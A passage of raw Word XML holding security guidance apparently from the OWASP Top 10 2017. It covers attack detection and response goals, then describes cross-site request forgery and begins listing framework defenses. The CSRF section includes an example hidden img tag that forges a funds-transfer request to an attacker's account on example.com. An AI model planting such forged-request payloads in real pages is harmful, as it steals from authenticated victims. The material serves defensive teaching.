      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "http://sqlmap.org/" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to detect vulnerabilities and possibly exploit them. Attack detection should recognize the application is being targeted with unusual requests and high volume. Automated scans should be easy to distinguish from normal traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> A skilled human attacker carefully probes for potential vulnerabilities, eventually finding an obscure flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>While more difficult to detect, this attack still involves requests that a normal user would never send, such as input not allowed by the UI. Tracking this attacker may require building a case over time that demonstrates malicious intent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Attacker starts exploiting a vulnerability in your application that your current attack protection fails to block.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>How quickly can you deploy a real or virtual patch to block continued exploitation of this vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>There are three primary goals for sufficient attack protection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Detect Attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Did something occur that is impossible for legitimate users to cause (e.g., an input a legitimate client can’t generate)? Is the application being used in a way that an ordinary user would never do (e.g., tempo too high, atypical input, unusual usage patterns, repeated requests)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Respond to Attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Logs and notifications are critical to timely response. Decide whether to automatically block requests, IP addresses, or IP ranges. Consider disabling or monitoring misbehaving user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Patch Quickly:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> If your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> process can’t push out critical patches in a day, deploy a </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tooltip="Virtual Patching Best Practices" w:history="1">
        <w:r w:rsidRPr="00D81337">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>virtual patch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> that analyzes HTTP traffic, data flow, and/or code execution and prevents vulnerabilities from being </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="004D49A4" w:rsidP="00B3263A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:tooltip="Top 10 2017-A8-Cross-Site Request Forgery (CSRF)" w:history="1">
        <w:r w:rsidR="00B3263A" w:rsidRPr="00B3263A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A8-Cross-Site Request Forgery (CSRF)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The application allows a user to submit a state changing request that does not include anything secret. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored on various sites under the attacker’s control:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> src="</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" width="0" height="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3263A" w:rsidRPr="00B3263A" w:rsidRDefault="00B3263A" w:rsidP="00B3263A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3263A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0F3B" w:rsidRPr="009E0F3B" w:rsidRDefault="009E0F3B" w:rsidP="009E0F3B">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do I Prevent 'Cross-Site Request Forgery (CSRF)'?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0F3B" w:rsidRPr="009E0F3B" w:rsidRDefault="009E0F3B" w:rsidP="009E0F3B">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The preferred option is to use an existing CSRF defense. Many frameworks now include built in CSRF defenses, such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="009E0F3B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Spring</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="009E0F3B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Play</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.djangoproject.com/en/1.10/topics/security/" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://angular.io/docs/ts/latest/guide/security.html" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009E0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
